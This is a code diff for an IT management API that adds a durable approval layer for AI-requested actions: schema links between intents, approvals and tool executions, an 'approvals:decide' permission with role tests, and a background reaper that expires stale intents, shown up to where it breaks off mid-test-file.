+    publishedAt: timestamp('published_at', { withTimezone: true }),
+    publishAttempts: integer('publish_attempts').notNull().default(0),
+  },
+  (table) => ({
+    intentIdIdx: index('intent_outbox_intent_id_idx').on(table.intentId),
+    // Note: the partial index intent_outbox_unpublished_idx (WHERE
+    // published_at IS NULL) is declared in the SQL migration only — Drizzle's
+    // index DSL doesn't model partial indexes cleanly (same precedent as
+    // elevations.ts's elevation_requests_org_pending_idx et al).
+  }),
+);
+
+export type IntentOutboxRow = typeof intentOutbox.$inferSelect;
+export type NewIntentOutboxRow = typeof intentOutbox.$inferInsert;

--- a/apps/api/src/db/schema/ai.ts
+++ b/apps/api/src/db/schema/ai.ts
@@ -3,6 +3,7 @@ import { organizations } from './orgs';
 import { users } from './users';
 import { devices } from './devices';
 import { portalUsers } from './portal';
+import { actionIntents } from './actionIntents';
 
 // ============================================
 // Enums
@@ -104,6 +105,14 @@ export const aiToolExecutions = pgTable('ai_tool_executions', {
   durationMs: integer('duration_ms'),
   errorMessage: text('error_message'),
   delegantToolCallId: varchar('delegant_tool_call_id', { length: 64 }),
+  // Links this execution ledger row to the durable action_intents row it was
+  // created for (Tier-3 chat flow only — services/actionIntents/intentService.ts's
+  // createActionIntent). NULL for legacy Tier-2 per_step / helper-PAM
+  // executions, which never go through the intents layer. Set in
+  // 2026-07-18-c-ai-executions-intent-id.sql; used by handleApproval
+  // (services/aiAgent.ts) to detect intent-backed executions and refuse to
+  // report a self-approval success for them (whole-branch review CRITICAL-3).
+  intentId: uuid('intent_id').references(() => actionIntents.id, { onDelete: 'set null' }),
   createdAt: timestamp('created_at').defaultNow().notNull(),
   completedAt: timestamp('completed_at')
 }, (table) => ({

--- a/apps/api/src/db/schema/approvals.ts
+++ b/apps/api/src/db/schema/approvals.ts
@@ -1,8 +1,9 @@
-import { pgTable, uuid, text, varchar, timestamp, jsonb, pgEnum, index, foreignKey, boolean, smallint } from 'drizzle-orm/pg-core';
+import { pgTable, uuid, text, varchar, timestamp, jsonb, pgEnum, index, foreignKey, boolean, smallint, char } from 'drizzle-orm/pg-core';
 import type { AssuranceLevel } from '@breeze/shared';
 import { users } from './users';
 import { oauthClients, oauthSessions } from './oauth';
 import { aiToolExecutions } from './ai';
+import { actionIntents } from './actionIntents';
 
 export const approvalRiskTierEnum = pgEnum('approval_risk_tier', [
   'low',
@@ -66,6 +67,29 @@ export const approvalRequests = pgTable(
     elevationRequestId: uuid('elevation_request_id'),
 
     /**
+     * Action intents & durable approval layer (spec 2026-07-18): links this
+     * fanned-out approval row back to the `action_intents` row it decides.
+     * One intent fans out to N approver rows, all carrying the same
+     * intent_id; the first approver to decide mirrors the decision onto the
+     * intent (first-wins CAS). Nullable — non-intent approvals (PAM,
+     * legacy AI agent, dev seed) never set it. ON DELETE CASCADE (unlike
+     * execution_id/elevation_request_id's SET NULL) — intent-linked approval
+     * rows have no independent audit meaning once their intent is gone.
+     * Enforced mutually exclusive with execution_id/elevation_request_id by
+     * approval_requests_one_source_chk.
+     */
+    intentId: uuid('intent_id').references(() => actionIntents.id, { onDelete: 'cascade' }),
+
+    /**
+     * What content this decision approved: SHA-256 hex digest bound at
+     * fan-out time to the intent's argument_digest. Recorded on the decision
+     * row itself (rather than re-read from the intent) so the approval
+     * ledger is self-describing even if the intent's digest were ever
+     * disputed. Nullable — only set for intent-linked rows.
+     */
+    boundArgumentDigest: char('bound_argument_digest', { length: 64 }),
+
+    /**
      * Server-issued: TRUE when the requesting OAuth client is the user's
      * own mobile app AND the request targets that same user (i.e. the phone
      * is approving its own action). Replaces the mobile client's
@@ -99,6 +123,7 @@ export const approvalRequests = pgTable(
     elevationRequestIdIdx: index('approval_requests_elevation_request_id_idx').on(
       t.elevationRequestId,
     ),
+    intentIdIdx: index('approval_requests_intent_id_idx').on(t.intentId),
     // FK to elevation_requests(id) ON DELETE SET NULL is declared in the
     // migration only (2026-06-27-pam-approval-elevation-link.sql). Modeling it
     // in Drizzle would force an `import { elevationRequests } from

--- a/apps/api/src/db/schema/index.ts
+++ b/apps/api/src/db/schema/index.ts
@@ -1,4 +1,5 @@
 export * from './accountDeletion';
+export * from './actionIntents';
 export * from './approvals';
 export * from './elevations';
 export * from './pam';

--- a/apps/api/src/db/seed.test.ts
+++ b/apps/api/src/db/seed.test.ts
@@ -179,6 +179,40 @@ describe('vulnerability risk-acceptance RBAC', () => {
   });
 });
 
+describe('approvals:decide permission (action intents approval layer, §4)', () => {
+  const byName = (name: string) => SYSTEM_ROLES.find((r) => r.name === name);
+
+  it('defines approvals:decide in DEFAULT_PERMISSIONS', () => {
+    expect(
+      DEFAULT_PERMISSIONS.some(
+        (p) => p.resource === 'approvals' && p.action === 'decide',
+      ),
+    ).toBe(true);
+  });
+
+  it('registers approvals:decide in the shared PERMISSION_GRANTS registry', () => {
+    expect(PERMISSION_GRANTS.APPROVALS_DECIDE).toEqual({ resource: 'approvals', action: 'decide' });
+  });
+
+  it('grants approvals:decide to Org Admin', () => {
+    expect(byName('Org Admin')?.permissions).toContain('approvals:decide');
+  });
+
+  it('does NOT grant approvals:decide to Org Technician', () => {
+    expect(byName('Org Technician')?.permissions).not.toContain('approvals:decide');
+  });
+
+  it('does NOT grant approvals:decide to Org Viewer', () => {
+    expect(byName('Org Viewer')?.permissions).not.toContain('approvals:decide');
+  });
+
+  it('Partner Admin covers approvals:decide via the wildcard grant (does not need a redundant literal entry)', () => {
+    const role = byName('Partner Admin');
+    expect(role?.permissions).toContain('*:*');
+    expect(role?.permissions).not.toContain('approvals:decide');
+  });
+});
+
 describe('topology:write permission (issue #1728)', () => {
   it('topology:write is a seeded permission', () => {
     const keys = DEFAULT_PERMISSIONS.map((p) => `${p.resource}:${p.action}`);

--- a/apps/api/src/db/seed.ts
+++ b/apps/api/src/db/seed.ts
@@ -200,6 +200,10 @@ export const DEFAULT_PERMISSIONS = [
   { resource: 'ai_sessions', action: 'read_all',
     description: "View all users' AI session history (admin audit dashboard)" },
 
+  // Action intents / durable approvals
+  { resource: 'approvals', action: 'decide',
+    description: 'Decide (approve/deny) pending action-intent approvals' },
+
   // Admin
   { resource: '*', action: '*', description: 'Full administrative access' }
 ];
@@ -284,7 +288,8 @@ export const SYSTEM_ROLES = [
       'remote:access',
       'audit:read',
       'vulnerabilities:accept_risk',
-      'ai_sessions:read_all'
+      'ai_sessions:read_all',
+      'approvals:decide'
     ]
   },
   {

--- a/apps/api/src/index.ts
+++ b/apps/api/src/index.ts
@@ -255,6 +255,8 @@ import {
 import { initializeStaleCommandReaper, shutdownStaleCommandReaper } from './jobs/staleCommandReaper';
 import { initializePamJobs, shutdownPamJobs } from './jobs/pamJobs';
 import { initializeApprovalExpiryReaper, shutdownApprovalExpiryReaper } from './jobs/approvalExpiryReaper';
+import { initializeIntentOutboxPublisher, shutdownIntentOutboxPublisher } from './jobs/intentOutboxPublisher';
+import { initializeIntentExpiryReaper, shutdownIntentExpiryReaper } from './jobs/intentExpiryReaper';
 import { initializeStripeReconcileSweep, shutdownStripeReconcileSweep } from './jobs/stripeReconcileSweep';
 import { initializeQuoteExpiryReaper, shutdownQuoteExpiryReaper } from './jobs/quoteExpiryReaper';
 import { initializeSuppressionExpiryReaper, shutdownSuppressionExpiryReaper } from './jobs/suppressionExpiryReaper';
@@ -1230,6 +1232,8 @@ async function initializeWorkers(): Promise<void> {
     ['staleCommandReaper', initializeStaleCommandReaper],
     ['pamJobs', initializePamJobs],
     ['approvalExpiryReaper', initializeApprovalExpiryReaper],
+    ['intentOutboxPublisher', initializeIntentOutboxPublisher],
+    ['intentExpiryReaper', initializeIntentExpiryReaper],
     ['stripeReconcileSweep', initializeStripeReconcileSweep],
     ['quoteExpiryReaper', initializeQuoteExpiryReaper],
     ['suppressionExpiryReaper', initializeSuppressionExpiryReaper],
@@ -1407,6 +1411,8 @@ async function shutdownRuntime(signal: NodeJS.Signals): Promise<void> {
     shutdownStaleCommandReaper,
     shutdownPamJobs,
     shutdownApprovalExpiryReaper,
+    shutdownIntentOutboxPublisher,
+    shutdownIntentExpiryReaper,
     shutdownStripeReconcileSweep,
     shutdownQuoteExpiryReaper,
     shutdownSuppressionExpiryReaper,

--- a/apps/api/src/index.ts
+++ b/apps/api/src/index.ts
@@ -257,6 +257,7 @@ import { initializePamJobs, shutdownPamJobs } from './jobs/pamJobs';
 import { initializeApprovalExpiryReaper, shutdownApprovalExpiryReaper } from './jobs/approvalExpiryReaper';
 import { initializeIntentOutboxPublisher, shutdownIntentOutboxPublisher } from './jobs/intentOutboxPublisher';
 import { initializeIntentExpiryReaper, shutdownIntentExpiryReaper } from './jobs/intentExpiryReaper';
+import { initializeIntentReleaseWorker, shutdownIntentReleaseWorker } from './jobs/intentReleaseWorker';
 import { initializeStripeReconcileSweep, shutdownStripeReconcileSweep } from './jobs/stripeReconcileSweep';
 import { initializeQuoteExpiryReaper, shutdownQuoteExpiryReaper } from './jobs/quoteExpiryReaper';
 import { initializeSuppressionExpiryReaper, shutdownSuppressionExpiryReaper } from './jobs/suppressionExpiryReaper';
@@ -1234,6 +1235,7 @@ async function initializeWorkers(): Promise<void> {
     ['approvalExpiryReaper', initializeApprovalExpiryReaper],
     ['intentOutboxPublisher', initializeIntentOutboxPublisher],
     ['intentExpiryReaper', initializeIntentExpiryReaper],
+    ['intentReleaseWorker', initializeIntentReleaseWorker],
     ['stripeReconcileSweep', initializeStripeReconcileSweep],
     ['quoteExpiryReaper', initializeQuoteExpiryReaper],
     ['suppressionExpiryReaper', initializeSuppressionExpiryReaper],
@@ -1413,6 +1415,7 @@ async function shutdownRuntime(signal: NodeJS.Signals): Promise<void> {
     shutdownApprovalExpiryReaper,
     shutdownIntentOutboxPublisher,
     shutdownIntentExpiryReaper,
+    shutdownIntentReleaseWorker,
     shutdownStripeReconcileSweep,
     shutdownQuoteExpiryReaper,
     shutdownSuppressionExpiryReaper,

--- a/apps/api/src/jobs/intentExpiryReaper.test.ts
+++ b/apps/api/src/jobs/intentExpiryReaper.test.ts
@@ -1,0 +1,233 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+const { executeMock, updateMock } = vi.hoisted(() => ({
+  executeMock: vi.fn(),
+  updateMock: vi.fn(),
+}));
+
+vi.mock('bullmq', () => ({
+  Queue: class {},
+  Worker: class {},
+  Job: class {},
+}));
+
+vi.mock('../db', async (importOriginal) => {
+  const actual = await importOriginal<typeof import('../db')>();
+  return {
+    ...actual,
+    db: {
+      ...actual.db,
+      execute: (...args: unknown[]) => executeMock(...(args as [])),
+      update: (...args: unknown[]) => updateMock(...(args as [])),
+    },
+    withSystemDbAccessContext: async <T>(fn: () => Promise<T>) => fn(),
+  };
+});
+
+vi.mock('../services/redis', () => ({
+  getRedisConnection: vi.fn(() => ({})),
+  getBullMQConnection: vi.fn(() => ({ host: 'localhost', port: 6379 })),
+  isBullMQAvailable: vi.fn(() => true),
+}));
+
+vi.mock('../services/sentry', () => ({
+  captureException: vi.fn(),
+}));
+
+vi.mock('../services/auditEvents', () => ({
+  writeAuditEvent: vi.fn(),
+  requestLikeFromSnapshot: vi.fn(() => ({ req: { header: () => undefined } })),
+}));
+
+vi.mock('../services/actionIntents/metrics', () => ({
+  recordActionIntentEvent: vi.fn(),
+  recordActionIntentMetric: vi.fn(),
+}));
+
+import { reapExpiredIntents, reapStaleExecutingIntents } from './intentExpiryReaper';
+import { writeAuditEvent } from '../services/auditEvents';
+import { captureException } from '../services/sentry';
+import { recordActionIntentEvent, recordActionIntentMetric } from '../services/actionIntents/metrics';
+import { approvalRequests } from '../db/schema/approvals';
+
+function makeUpdateChain(returningValue: unknown = undefined) {
+  const where = vi.fn(() => Promise.resolve(returningValue));
+  const set = vi.fn(() => ({ where }));
+  return { set, where };
+}
+
+describe('intentExpiryReaper.reapExpiredIntents', () => {
+  beforeEach(() => {
+    vi.resetAllMocks();
+  });
+
+  it('flips pending_approval/approved intents past expiry to expired, expires linked approvals, and audits', async () => {
+    const past = new Date(Date.now() - 60_000);
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 'intent-1',
+          org_id: 'org-1',
+          action_name: 'breeze.runScript',
+          argument_digest: 'digest-1',
+          source: 'chat',
+          requested_by_user_id: 'user-1',
+          expires_at: past,
+        },
+      ],
+    });
+
+    const chain = makeUpdateChain([]);
+    updateMock.mockImplementation((table: unknown) => {
+      if (table === approvalRequests) {
+        return { set: chain.set };
+      }
+      throw new Error(`Unexpected table update: ${String(table)}`);
+    });
+
+    const reaped = await reapExpiredIntents();
+
+    expect(reaped).toBe(1);
+    expect(executeMock).toHaveBeenCalledTimes(1);
+    // Linked pending approval_requests rows for this intent are expired.
+    expect(updateMock).toHaveBeenCalledTimes(1);
+    expect(updateMock).toHaveBeenCalledWith(approvalRequests);
+    expect(chain.set).toHaveBeenCalledWith(
+      expect.objectContaining({ status: 'expired' }),
+    );
+
+    expect(recordActionIntentEvent).toHaveBeenCalledTimes(1);
+    expect(recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({
+        orgId: 'org-1',
+        intentId: 'intent-1',
+        actionName: 'breeze.runScript',
+        argumentDigest: 'digest-1',
+        source: 'chat',
+        outcome: 'expired',
+      }),
+    );
+  });
+
+  it('returns 0 and touches nothing when no intents are past expiry', async () => {
+    executeMock.mockResolvedValueOnce({ rows: [] });
+
+    const reaped = await reapExpiredIntents();
+
+    expect(reaped).toBe(0);
+    expect(updateMock).not.toHaveBeenCalled();
+    expect(recordActionIntentEvent).not.toHaveBeenCalled();
+  });
+
+  it('transitions both pending_approval and approved intents in one pass', async () => {
+    const past = new Date(Date.now() - 5_000);
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 'intent-pending',
+          org_id: 'org-1',
+          action_name: 'breeze.a',
+          argument_digest: 'd1',
+          source: 'chat',
+          requested_by_user_id: 'user-1',
+          expires_at: past,
+        },
+        {
+          id: 'intent-approved',
+          org_id: 'org-1',
+          action_name: 'breeze.b',
+          argument_digest: 'd2',
+          source: 'mcp_api',
+          requested_by_user_id: null,
+          expires_at: past,
+        },
+      ],
+    });
+    const chain = makeUpdateChain([]);
+    updateMock.mockReturnValue({ set: chain.set });
+
+    const reaped = await reapExpiredIntents();
+
+    expect(reaped).toBe(2);
+    expect(recordActionIntentEvent).toHaveBeenCalledTimes(2);
+  });
+});
+
+describe('intentExpiryReaper.reapStaleExecutingIntents', () => {
+  beforeEach(() => {
+    vi.resetAllMocks();
+  });
+
+  it('flips stuck executing intents to failed/execution_lost and audits with result failure', async () => {
+    const decidedAt = new Date(Date.now() - 25 * 60 * 1000);
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 'intent-2',
+          org_id: 'org-2',
+          action_name: 'breeze.deleteRegistryKey',
+          argument_digest: 'digest-2',
+          source: 'mcp_api',
+          decided_at: decidedAt,
+        },
+      ],
+    });
+
+    const reaped = await reapStaleExecutingIntents();
+
+    expect(reaped).toBe(1);
+    expect(writeAuditEvent).toHaveBeenCalledTimes(1);
+    expect(writeAuditEvent).toHaveBeenCalledWith(
+      expect.anything(),
+      expect.objectContaining({
+        orgId: 'org-2',
+        action: 'action_intent.executed',
+        resourceType: 'action_intent',
+        resourceId: 'intent-2',
+        actorType: 'system',
+        result: 'failure',
+        details: expect.objectContaining({ errorCode: 'execution_lost' }),
+      }),
+    );
+    // Metrics counter still records this as an 'executed' outcome even
+    // though the audit path bypasses recordActionIntentEvent (see file
+    // header: 'executed' isn't in metrics.ts's FAILURE_OUTCOMES set, so
+    // recordActionIntentEvent would mis-file this as a success).
+    expect(recordActionIntentMetric).toHaveBeenCalledWith('mcp_api', 'breeze.deleteRegistryKey', 'executed');
+    expect(recordActionIntentEvent).not.toHaveBeenCalled();
+  });
+
+  it('returns 0 when nothing is stuck past the stale-executing timeout', async () => {
+    executeMock.mockResolvedValueOnce({ rows: [] });
+
+    const reaped = await reapStaleExecutingIntents();
+
+    expect(reaped).toBe(0);
+    expect(writeAuditEvent).not.toHaveBeenCalled();
+    expect(recordActionIntentMetric).not.toHaveBeenCalled();
+  });
+
+  it('captures the error but does not throw if the audit write fails', async () => {
+    const decidedAt = new Date(Date.now() - 25 * 60 * 1000);
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 'intent-3',
+          org_id: 'org-3',
+          action_name: 'breeze.x',
+          argument_digest: 'digest-3',
+          source: 'chat',
+          decided_at: decidedAt,
+        },
+      ],
+    });
+    (writeAuditEvent as ReturnType<typeof vi.fn>).mockImplementationOnce(() => {
+      throw new Error('audit sink down');
+    });
+
+    const reaped = await reapStaleExecutingIntents();
+
+    expect(reaped).toBe(1);
+    expect(captureException).toHaveBeenCalled();
+  });
+});

--- a/apps/api/src/jobs/intentExpiryReaper.ts
+++ b/apps/api/src/jobs/intentExpiryReaper.ts
@@ -1,0 +1,361 @@
+import { Job, Queue, Worker } from 'bullmq';
+import { and, eq, inArray, sql } from 'drizzle-orm';
+import * as dbModule from '../db';
+import { db } from '../db';
+import { actionIntents } from '../db/schema/actionIntents';
+import type { ActionIntentSource } from '../db/schema/actionIntents';
+import { approvalRequests } from '../db/schema/approvals';
+import { getBullMQConnection } from '../services/redis';
+import { captureException } from '../services/sentry';
+import { writeAuditEvent, requestLikeFromSnapshot } from '../services/auditEvents';
+import { recordActionIntentEvent, recordActionIntentMetric } from '../services/actionIntents/metrics';
+
+/**
+ * Reaps `action_intents` rows past their deadline (spec
+ * docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+ * §3.4 + §8). Kept as a sibling of `approvalExpiryReaper.ts` rather than an
+ * extension of it: that file's whole shape (queue name, job data type, audit
+ * action string, and its `ai_tool_executions` mirror step) is specific to
+ * `approval_requests`. This sweep operates on a different table
+ * (`action_intents`) with two independent CAS transitions, so folding it in
+ * would roughly double that file's size while blurring two distinct
+ * concerns — same "split when it improves clarity" guidance CLAUDE.md gives
+ * for route/service files.
+ *
+ * Two sweeps run every pass:
+ *
+ * 1. `reapExpiredIntents` — `pending_approval`/`approved` intents whose
+ *    `expires_at` has passed → `expired`. Approval does NOT stop the clock:
+ *    an approved-but-not-yet-released intent still expires if execution
+ *    never begins in time. Linked `approval_requests` rows still `pending`
+ *    for that intent are expired in the same pass. Uses
+ *    `recordActionIntentEvent(..., outcome: 'expired')` — `expired` is one
+ *    of the seven canonical outcomes Task 4's metrics helper models (spec
+ *    §7), so both the audit row and the Prometheus counter come from one
+ *    call.
+ *
+ * 2. `reapStaleExecutingIntents` — intents stuck in `executing` with no
+ *    `executed_at` for longer than STALE_EXECUTING_TIMEOUT_MINUTES (2x+ the
+ *    longest tool timeout, spec §8) → `failed` with `error_code:
+ *    'execution_lost'`. This does NOT use `recordActionIntentEvent`: its
+ *    `outcome` enum only treats `rejected`/`expired`/`cancelled` as audit
+ *    failures (see metrics.ts's `FAILURE_OUTCOMES`), so recording outcome
+ *    `'executed'` would mis-file this as `result: 'success'`. Instead this
+ *    writes the audit row directly (`action_intent.executed`, `result:
+ *    'failure'`) — the exact fallback CLAUDE.md/the task brief calls for
+ *    when an outcome doesn't fit the enum — and bumps the Prometheus counter
+ *    separately via `recordActionIntentMetric` so `executed` totals still
+ *    include this path.
+ *
+ * Runs every 30 seconds (mirrors approvalExpiryReaper's cadence) inside
+ * `withSystemDbAccessContext` — action_intents is org-scoped RLS (shape 1),
+ * but expiry/stale-execution reaping is a system job.
+ */
+
+const QUEUE_NAME = 'intent-expiry-reaper';
+const REAP_INTERVAL_MS = 30 * 1000; // every 30s
+const MAX_REAP_PER_RUN = 500;
+// >= 2x the longest tool execution timeout (spec §8) — comfortably beyond any
+// legitimate in-flight execution, so a still-`executing` row this old means
+// the release worker died mid-flight, not that the tool is merely slow.
+const STALE_EXECUTING_TIMEOUT_MINUTES = 20;
+
+type ReaperJobData = { type: 'reap-expired-intents'; queuedAt: string };
+
+const runWithSystemDbAccess = async <T>(fn: () => Promise<T>): Promise<T> => {
+  const withSystem = dbModule.withSystemDbAccessContext;
+  if (typeof withSystem !== 'function') {
+    throw new Error(
+      '[IntentExpiryReaper] withSystemDbAccessContext not available — reaper cannot run without system DB access',
+    );
+  }
+  return withSystem(fn);
+};
+
+let reaperQueue: Queue<ReaperJobData> | null = null;
+let reaperWorker: Worker<ReaperJobData> | null = null;
+
+function getQueue(): Queue<ReaperJobData> {
+  if (!reaperQueue) {
+    reaperQueue = new Queue<ReaperJobData>(QUEUE_NAME, {
+      connection: getBullMQConnection(),
+    });
+  }
+  return reaperQueue;
+}
+
+// `type` (not `interface`) so TS's implicit index signature for object type
+// literals applies — `db.execute<T>`'s constraint is `Record<string,
+// unknown>`, which a plain `interface` declaration does not structurally
+// satisfy without an explicit `[key: string]: unknown` member (TS2344).
+type ExpiredIntentRow = {
+  id: string;
+  org_id: string;
+  action_name: string;
+  argument_digest: string;
+  source: string;
+  requested_by_user_id: string | null;
+  expires_at: Date;
+};
+
+type StaleExecutingIntentRow = {
+  id: string;
+  org_id: string;
+  action_name: string;
+  argument_digest: string;
+  source: string;
+  decided_at: Date | null;
+};
+
+function extractRows<T>(result: unknown): T[] {
+  const rows = (result as { rows?: T[] }).rows ?? (result as T[]);
+  return Array.isArray(rows) ? rows : [];
+}
+
+/**
+ * Flips `pending_approval`/`approved` intents whose `expires_at` is in the
+ * past to `expired`, expires their still-`pending` linked approval rows, and
+ * writes one `action_intent.expired` audit event per intent. Bounded to
+ * MAX_REAP_PER_RUN via a CTE so a backlog spike can't lock the table for
+ * too long. Returns the number of intents transitioned.
+ */
+export async function reapExpiredIntents(): Promise<number> {
+  const transitioned = await db.execute<ExpiredIntentRow>(sql`
+    WITH due AS (
+      SELECT id
+      FROM ${actionIntents}
+      WHERE ${actionIntents.status} IN ('pending_approval', 'approved')
+        AND ${actionIntents.expiresAt} < now()
+      ORDER BY ${actionIntents.expiresAt} ASC
+      LIMIT ${MAX_REAP_PER_RUN}
+      FOR UPDATE SKIP LOCKED
+    )
+    UPDATE ${actionIntents} AS a
+    SET status = 'expired'
+    FROM due
+    WHERE a.id = due.id
+      AND a.status IN ('pending_approval', 'approved')
+    RETURNING
+      a.id,
+      a.org_id,
+      a.action_name,
+      a.argument_digest,
+      a.source,
+      a.requested_by_user_id,
+      a.expires_at;
+  `);
+
+  const rows = extractRows<ExpiredIntentRow>(transitioned);
+  if (rows.length === 0) {
+    return 0;
+  }
+
+  const intentIds = rows.map((r) => r.id);
+
+  // Expire any still-pending approval rows fanned out for these intents —
+  // approval does not stop the clock, so an approved intent can still have
+  // sibling rows sitting `pending` when it times out.
+  try {
+    await db
+      .update(approvalRequests)
+      .set({ status: 'expired', decidedAt: new Date() })
+      .where(and(eq(approvalRequests.status, 'pending'), inArray(approvalRequests.intentId, intentIds)));
+  } catch (err) {
+    console.error('[IntentExpiryReaper] Failed to expire linked approval_requests:', err);
+    captureException(err instanceof Error ? err : new Error(String(err)));
+  }
+
+  for (const row of rows) {
+    try {
+      recordActionIntentEvent({
+        orgId: row.org_id,
+        intentId: row.id,
+        actionName: row.action_name,
+        argumentDigest: row.argument_digest,
+        source: row.source as ActionIntentSource,
+        outcome: 'expired',
+        details: {
+          requestedByUserId: row.requested_by_user_id,
+          expiresAt: row.expires_at instanceof Date ? row.expires_at.toISOString() : row.expires_at,
+        },
+      });
+    } catch (err) {
+      console.error('[IntentExpiryReaper] Failed to write audit event:', err);
+      captureException(err instanceof Error ? err : new Error(String(err)));
+    }
+  }
+
+  if (rows.length === MAX_REAP_PER_RUN) {
+    console.warn(`[IntentExpiryReaper] Hit ${MAX_REAP_PER_RUN}-item cap — backlog may be growing`);
+  }
+
+  return rows.length;
+}
+
+/**
+ * Flips intents stuck in `executing` (no `executed_at`, `decided_at` older
+ * than STALE_EXECUTING_TIMEOUT_MINUTES) to `failed` with `error_code:
+ * 'execution_lost'`. Writes an `action_intent.executed` audit event with
+ * `result: 'failure'` directly (see file header for why this bypasses
+ * `recordActionIntentEvent`). Returns the number of intents transitioned.
+ */
+export async function reapStaleExecutingIntents(): Promise<number> {
+  const transitioned = await db.execute<StaleExecutingIntentRow>(sql`
+    WITH due AS (
+      SELECT id
+      FROM ${actionIntents}
+      WHERE ${actionIntents.status} = 'executing'
+        AND ${actionIntents.executedAt} IS NULL
+        AND ${actionIntents.decidedAt} < now() - (${STALE_EXECUTING_TIMEOUT_MINUTES} * interval '1 minute')
+      ORDER BY ${actionIntents.decidedAt} ASC
+      LIMIT ${MAX_REAP_PER_RUN}
+      FOR UPDATE SKIP LOCKED
+    )
+    UPDATE ${actionIntents} AS a
+    SET status = 'failed',
+        error_code = 'execution_lost'
+    FROM due
+    WHERE a.id = due.id
+      AND a.status = 'executing'
+      AND a.executed_at IS NULL
+    RETURNING
+      a.id,
+      a.org_id,
+      a.action_name,
+      a.argument_digest,
+      a.source,
+      a.decided_at;
+  `);
+
+  const rows = extractRows<StaleExecutingIntentRow>(transitioned);
+  if (rows.length === 0) {
+    return 0;
+  }
+
+  const requestLike = requestLikeFromSnapshot({});
+  for (const row of rows) {
+    try {
+      writeAuditEvent(requestLike, {
+        orgId: row.org_id,
+        action: 'action_intent.executed',
+        resourceType: 'action_intent',
+        resourceId: row.id,
+        actorType: 'system',
+        actorId: null,
+        result: 'failure',
+        details: {
+          actionName: row.action_name,
+          argumentDigest: row.argument_digest,
+          source: row.source,
+          errorCode: 'execution_lost',
+          decidedAt: row.decided_at instanceof Date ? row.decided_at.toISOString() : row.decided_at,
+          staleExecutingTimeoutMinutes: STALE_EXECUTING_TIMEOUT_MINUTES,
+        },
+      });
+      recordActionIntentMetric(row.source as ActionIntentSource, row.action_name, 'executed');
+    } catch (err) {
+      console.error('[IntentExpiryReaper] Failed to write stale-executing audit event:', err);
+      captureException(err instanceof Error ? err : new Error(String(err)));
+    }
+  }
+
+  if (rows.length === MAX_REAP_PER_RUN) {
+    console.warn(`[IntentExpiryReaper] Hit ${MAX_REAP_PER_RUN}-item cap on stale-executing sweep — backlog may be growing`);
+  }
+
+  return rows.length;
+}
+
+function createWorker(): Worker<ReaperJobData> {
+  return new Worker<ReaperJobData>(
+    QUEUE_NAME,
+    async (_job: Job<ReaperJobData>) => {
+      try {
+        const expired = await runWithSystemDbAccess(reapExpiredIntents);
+        const staleFailed = await runWithSystemDbAccess(reapStaleExecutingIntents);
+        if (expired > 0 || staleFailed > 0) {
+          console.log(
+            `[IntentExpiryReaper] Expired ${expired} intent(s), failed ${staleFailed} stale-executing intent(s)`,
+          );
+        }
+        return { expired, staleFailed };
+      } catch (err) {
+        console.error('[IntentExpiryReaper] Run failed:', err);
+        captureException(err instanceof Error ? err : new Error(String(err)));
+        throw err;
+      }
+    },
+    {
+      connection: getBullMQConnection(),
+      concurrency: 1,
+    },
+  );
+}
+
+async function scheduleRepeatableJob(): Promise<void> {
+  const queue = getQueue();
+
+  const repeatables = await queue.getRepeatableJobs();
+  for (const job of repeatables) {
+    if (job.name === 'reap-expired-intents') {
+      await queue.removeRepeatableByKey(job.key);
+    }
+  }
+
+  await queue.add(
+    'reap-expired-intents',
+    { type: 'reap-expired-intents', queuedAt: new Date().toISOString() },
+    {
+      jobId: 'intent-expiry-reaper',
+      repeat: { every: REAP_INTERVAL_MS },
+      removeOnComplete: { count: 20 },
+      removeOnFail: { count: 200 },
+    },
+  );
+}
+
+export async function initializeIntentExpiryReaper(): Promise<void> {
+  if (reaperWorker) return;
+
+  reaperWorker = createWorker();
+  reaperWorker.on('error', (error) => {
+    console.error('[IntentExpiryReaper] Worker error:', error);
+    captureException(error);
+  });
+  reaperWorker.on('failed', (job, error) => {
+    console.error(`[IntentExpiryReaper] Job ${job?.id} failed:`, error);
+    captureException(error);
+  });
+
+  try {
+    await scheduleRepeatableJob();
+  } catch (err) {
+    await reaperWorker.close();
+    reaperWorker = null;
+    throw err;
+  }
+
+  console.log('[IntentExpiryReaper] Initialized');
+}
+
+export async function shutdownIntentExpiryReaper(): Promise<void> {
+  const worker = reaperWorker;
+  const queue = reaperQueue;
+  reaperWorker = null;
+  reaperQueue = null;
+
+  if (worker) {
+    try {
+      await worker.close();
+    } catch (err) {
+      console.error('[IntentExpiryReaper] Error closing worker:', err);
+    }
+  }
+  if (queue) {
+    try {
+      await queue.close();
+    } catch (err) {
+      console.error('[IntentExpiryReaper] Error closing queue:', err);
+    }
+  }
+}

--- a/apps/api/src/jobs/intentOutboxPublisher.test.ts
+++ b/apps/api/src/jobs/intentOutboxPublisher.test.ts
@@ -13,8 +13,27 @@ vi.mock('bullmq', () => ({
   Job: class {},
 }));
 
+// Real AsyncLocalStorage-backed context tracking — NOT a bare identity
+// pass-through. This is the #1105 regression the new test below exists to
+// catch: an identity `withSystemDbAccessContext: fn => fn()` mock would make
+// `hasDbAccessContext()` always report false and could never prove the
+// enqueue loop runs outside a held DB context. Self-contained inside the
+// factory (no outer-scope references) so vi.mock hoisting can't reorder it
+// ahead of its dependencies.
 vi.mock('../db', async (importOriginal) => {
   const actual = await importOriginal<typeof import('../db')>();
+  const { AsyncLocalStorage } = await import('node:async_hooks');
+  const contextStorage = new AsyncLocalStorage<true>();
+
+  const hasDbAccessContext = (): boolean => contextStorage.getStore() !== undefined;
+
+  const withSystemDbAccessContext = async <T>(fn: () => Promise<T>): Promise<T> => {
+    if (contextStorage.getStore()) return fn();
+    return contextStorage.run(true, fn);
+  };
+
+  const runOutsideDbContext = <T>(fn: () => T): T => contextStorage.exit(fn);
+
   return {
     ...actual,
     db: {
@@ -22,7 +41,9 @@ vi.mock('../db', async (importOriginal) => {
       execute: (...args: unknown[]) => executeMock(...(args as [])),
       update: (...args: unknown[]) => updateMock(...(args as [])),
     },
-    withSystemDbAccessContext: async <T>(fn: () => Promise<T>) => fn(),
+    hasDbAccessContext,
+    withSystemDbAccessContext,
